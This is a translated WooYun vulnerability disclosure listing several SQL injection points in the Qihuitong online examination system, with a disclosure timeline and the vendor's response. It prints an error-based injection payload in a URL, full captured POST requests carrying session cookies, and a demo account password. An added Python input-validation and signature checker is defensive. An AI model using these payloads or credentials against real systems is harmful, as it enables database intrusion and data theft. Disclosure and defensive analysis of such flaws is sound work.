Vulnerability summary

Defect ID: wooyun-2015-0144585

Title: Multiple SQL injections in the 企慧通 (Qihuitong) online examination system

Vendor: 深圳市标驰信息技术有限公司 (Shenzhen Biaochi Information Technology Co., Ltd.)

Author: 路人甲

Submitted: 2015-10-10 15:20

Fixed: 2016-01-12 17:26

Published: 2016-01-12 17:26

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-10: Details sent to the vendor; awaiting vendor handling
2015-10-14: Vendor confirmed; details visible to the vendor only
2015-10-17: Details opened to third-party security partners (绿盟科技唐朝安全巡航)
2015-12-08: Details opened to core white hats and domain experts
2015-12-18: Details opened to regular white hats
2015-12-28: Details opened to intern white hats
2016-01-12: Details opened to the public

Summary:

Several injection points bundled into one report, tested against the official demo.

Detailed description:

The 企慧通 online examination system by 深圳市标驰信息技术有限公司 is used by a large number of government agencies and universities.

http://**.**.**.**/Reception/evaluation-1.html


Injections in this system have been reported several times before, but some were evidently missed, so they are bundled into one submission here.
Some of the injection points require a login, but only an ordinary user account is needed; none of them is an administrative back-end injection.
The official demo is used for testing.
An account is provided for login testing:
Account: 15098997852
Password: 123456

http://study.**.**.**.**/


#1
Course browsing page; no login required here.

http://study.**.**.**.**/Course/dk_ViewCourse.aspx?c=B692AA9D7FEAD46E&Type=Stu&psIdH=646&cIdH=154


The psIdH parameter is injectable.

(screenshot: A.png)


(screenshot: QQ图片20151003000340.png)


#2
"View practice questions" page
http://study.**.**.**.**/myPaper/ViewExerciseSel.aspx?ModuleID=162&rId=21
The rId parameter is injectable; this injection requires a login.

http://study.**.**.**.**/myPaper/ViewExerciseSel.aspx?ModuleID=162&rId=21%20and%20(select%20count(*)%20from%20(select%201%20union%20select%20null%20union%20select%20!1)x%20group%20by%20concat((select%20table_name%20from%20information_schema.tables%20limit%201),floor(rand(0)*2)))


(screenshot: 3.png)


#3
"Create vote" page is injectable.
This injection requires a login.

http://study.**.**.**.**/Vote/vAdd_Vote.aspx?ModuleID=31


POST /Vote/vAdd_Vote.aspx?ModuleID=31 HTTP/1.1
Host: study.**.**.**.**
Proxy-Connection: keep-alive
Content-Length: 636
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://study.**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://study.**.**.**.**/Vote/vAdd_Vote.aspx?ModuleID=31
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4,ja;q=0.2
Cookie: sgsa_id=**.**.**.**|1441692549271083; LXB_REFER=**.**.**.**; LiveWSDBT73926065=1441692559880718124276; LiveWSDBT73926065sessionid=1441692559880718124276; ASP.NET_SessionId=3gq10xdtwpqpqh5p2bze4i04; szUserInfo=uId=6025C5F00520D3C6&uName=F3DEC7776B9D23B497D322F83E773949&uPassWord=B137572BCC214989C48C866A48F8D0024DB9A335AE09E08E&uRealName=AD8F4C218FBAAB1D&uSex=F5ACD9DD2127E3B9&uAge=&uPhone=F3DEC7776B9D23B497D322F83E773949&rId=69B29965B4C7F549&sId=1ADB017EEAE7AB72&companyId=1ADB017EEAE7AB72&uMood=&uImgMax=79F4FF0090863D0D9B9BAEAFAB9469AE8497308CBB24A508&uImgMin=79F4FF0090863D0D22FEB220CCA1D542100CFFE0D6148F04&uDateTime=E5A55D7D7FF53B2B8B8C562F0F0FDD841FD2CBE1E0C1BAC5&uLoginTime=E5A55D7D7FF53B2B7B02667882BF3D5F43EFE4E52D3FE1DD&uJiFen=54B3330154E68331; sgsa_vt_176817_181449=1441719769327; Hm_lvt_dbb1c44cf6881a3b6d28b7fcd3c5bd0e=1441692549; Hm_lpvt_dbb1c44cf6881a3b6d28b7fcd3c5bd0e=1441719770; AutoLoginOut=LoginTime=2015-9-8 21:53:26
__VIEWSTATE=%2FwEPDwULLTIxNDQzNTYzMzhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQhiZ2NTaG93MQUIYmdjU2hvdzKQF%2FWlqHeKXO71IeLzK1mXQlAjqtqEqqdnYDQlY0WKdQ%3D%3D&__VIEWSTATEGENERATOR=B8C99DC4&__EVENTVALIDATION=%2FwEWEwK76%2BLUBgKd1sMYAqr6yuwFAqCv8sgJAvHqy4gIAtaBrvMNAs%2FzmIkLArSK%2B3MChcbUsw8C6ty2ngUCk%2BL%2BhwUC%2BPjg8goCoK%2Bylg4CpuHQigwC6cz33gQCgIDczQkCgICoYQLoqPvEBwKOg%2BWfAyP%2F%2FeGxHqVgfWw56cE%2FWmSkFzBAVITBKwCp5QpVtbXF&topic=qqq&intro=&answer1=q&answer2=qqq&answer3=qq&answer4=&answer5=&answer6=&answer7=&answer8=&answer9=&answer10=&type=1&bgEnd=2015-10-06+21%3A52%3A23&bgcShow=bgcShow1&bgSubmit=%E5%A2%9E%E5%8A%A0&bgMsg=


The bgEnd parameter is injectable.

(screenshot: QQ图片20151003001042.png)


#4
Points (积分) query page
http://study.**.**.**.**/JiFen/sel_jf_xx.aspx?userID=259&ModuleID=130
Pick any start and end time, click "View", and capture the resulting POST request:

POST /JiFen/sel_jf_xx.aspx?userID=259&ModuleID=130 HTTP/1.1
Host: study.**.**.**.**
Proxy-Connection: keep-alive
Content-Length: 489
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://study.**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://study.**.**.**.**/JiFen/sel_jf_xx.aspx?userID=259&ModuleID=130
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4,ja;q=0.2
Cookie: sgsa_id=**.**.**.**|1441692549271083; LiveWSDBT73926065=1441692559880718124276; ASP.NET_SessionId=3gq10xdtwpqpqh5p2bze4i04; sgsa_vt_176817_181449=1441728787544; Hm_lvt_dbb1c44cf6881a3b6d28b7fcd3c5bd0e=1441692549,1441728778,1441728788; Hm_lpvt_dbb1c44cf6881a3b6d28b7fcd3c5bd0e=1441728788; LXB_REFER=**.**.**.**; szUserInfo=uId=6025C5F00520D3C6&uName=F3DEC7776B9D23B497D322F83E773949&uPassWord=B137572BCC214989C48C866A48F8D0024DB9A335AE09E08E&uRealName=66C857DD5BE9F653&uSex=F5ACD9DD2127E3B9&uAge=&uPhone=F3DEC7776B9D23B497D322F83E773949&rId=69B29965B4C7F549&sId=1ADB017EEAE7AB72&companyId=1ADB017EEAE7AB72&uMood=&uImgMax=79F4FF0090863D0D9B9BAEAFAB9469AE8497308CBB24A508&uImgMin=79F4FF0090863D0D22FEB220CCA1D542100CFFE0D6148F04&uDateTime=E5A55D7D7FF53B2B8B8C562F0F0FDD841FD2CBE1E0C1BAC5&uLoginTime=E5A55D7D7FF53B2BDD8536829BBE4CECA23A8A85BABB7EB0&uJiFen=54B3330154E68331; AutoLoginOut=LoginTime=2015-9-9 23:56:17
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTExMjI0OTE1NDAPZBYCAgMPZBYCAgQPFgIeC18hSXRlbUNvdW50ZmRkZhWal3H0Eav49H6ca6poRgDYNHe9bZyfJsVhu4G309c%3D&__VIEWSTATEGENERATOR=048F3053&__EVENTVALIDATION=%2FwEWCQLsmK7aAwKWmvmbBAKx9J3vBgK8363BAgLH0vaKCgKxmbWVDAKM54rGBgLQ8YSoDwLKlbmzAaiFktavBE93isuxRnuz4Ur5d8CxIxjfbXIemwgaV6qR&DropDownList1=%E7%A7%AF%E5%88%86%E5%8A%A0%E5%87%8F&starc=2015-09-03+23%3A57%3A11&end=2015-09-29+23%3A57%3A14&Button1=%E6%9F%A5%E7%9C%8B&hiddenfield=


The starc and end parameters carry the times just selected; both parameters are injectable.

(screenshot: C.png)


(screenshot: D.png)
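As an added defensive example (not part of the original report), the following Python checks a request's decoded query string and form body in two ways: an allow-list that validates the parameters the report names against the type their sample values imply, and a signature match for the error-based payload fragments quoted in item #2. The placeholder host and the expected-type table are assumptions.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qsl

# Parameters the report names as injectable, with the type their sample
# values imply (assumption: integers and "YYYY-MM-DD HH:MM:SS" timestamps).
NUMERIC_PARAMS = {"psIdH", "cIdH", "rId", "ModuleID", "userID"}
DATETIME_PARAMS = {"bgEnd", "starc", "end"}

# Fragments of the error-based payload quoted in item #2 of the report.
SQLI_SIGNATURES = [
    r"information_schema",
    r"floor\s*\(\s*rand\s*\(",
    r"union\s+select",
    r"group\s+by\s+concat\s*\(",
]

def check_params(pairs):
    """Return (param, reason) for each value with the wrong type or a known payload fragment."""
    findings = []
    for name, value in pairs:
        if name in NUMERIC_PARAMS and not value.isdigit():
            findings.append((name, "expected integer"))
        elif name in DATETIME_PARAMS:
            try:
                datetime.strptime(value, "%Y-%m-%d %H:%M:%S")
            except ValueError:
                findings.append((name, "expected datetime"))
        for sig in SQLI_SIGNATURES:
            if re.search(sig, value, re.IGNORECASE):
                findings.append((name, "sqli signature: " + sig))
                break  # one signature hit per parameter is enough
    return findings

def check_request(url, body=None):
    # parse_qsl percent-decodes values and turns '+' into spaces
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if body:
        pairs += parse_qsl(body, keep_blank_values=True)
    return check_params(pairs)

# Constructed samples: the host is a placeholder; the parameter values are the
# ones quoted in the report (item #1 benign, item #2 with the injected rId).
HOST = "http://study.example.invalid"
CLEAN_URL = HOST + "/Course/dk_ViewCourse.aspx?c=B692AA9D7FEAD46E&Type=Stu&psIdH=646&cIdH=154"
INJECTED_URL = HOST + ("/myPaper/ViewExerciseSel.aspx?ModuleID=162&rId=21%20and%20(select%20count(*)%20from"
                       "%20(select%201%20union%20select%20null%20union%20select%20!1)x%20group%20by%20concat("
                       "(select%20table_name%20from%20information_schema.tables%20limit%201),floor(rand(0)*2)))")
CLEAN_BODY = "starc=2015-09-03+23%3A57%3A11&end=2015-09-29+23%3A57%3A14"
```

Such a check belongs in the server-side handler (or a WAF rule) in addition to, never instead of, parameterized queries.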


Proof of vulnerability:

Fix recommendation:

Copyright notice: please credit the source when reposting. 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 11

Confirmed: 2015-10-14 17:25

Vendor reply:


CNVD has confirmed the reported issue and has notified the software vendor by email through its public contact channel; the vendor will provide a fix and coordinate remediation with the affected user organisations.

Latest status:

None yet